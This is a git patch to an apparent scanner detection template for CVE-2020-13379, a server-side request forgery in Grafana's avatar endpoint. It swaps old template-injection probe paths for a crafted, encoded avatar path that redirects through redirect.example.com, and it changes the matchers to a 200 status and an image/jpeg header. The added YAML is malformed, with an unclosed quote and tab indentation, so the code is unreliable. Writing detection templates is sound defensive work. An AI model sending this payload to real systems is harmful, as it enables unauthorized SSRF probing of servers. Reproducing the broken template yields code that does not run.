From 3da6c533f0704a439d7b06bfa5ede6035b55ad23 Mon Sep 17 00:00:00 2001
From: joeldeleep <42582155+joeldeleep@users.noreply.github.com>
Date: Sun, 27 Sep 2020 11:58:57 +0530
Subject: [PATCH] Update CVE-2020-13379.yaml

The old matching using status code 502 returned false positive when the endpoint is already having a bad gateway. Going through the report here
https://hackerone.com/reports/878779 and video https://www.youtube.com/watch?v=NWHOmYbLrZ0 , the path has been rewritten and matched with respective image/jpeg as explained in the poc
---
 cves/CVE-2020-13379.yaml | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2020-13379.yaml b/cves/CVE-2020-13379.yaml
index 264c5ece3e..a3fe08b031 100644
--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@@ -13,10 +13,12 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
-      - '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
-      - "{{BaseURL}}/"
+      - '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
     matchers:
       - type: status
         status:
-          - 502
+          - 200
+      - type: word
+	      words:
+	        - "image/jpeg"
+	      part: header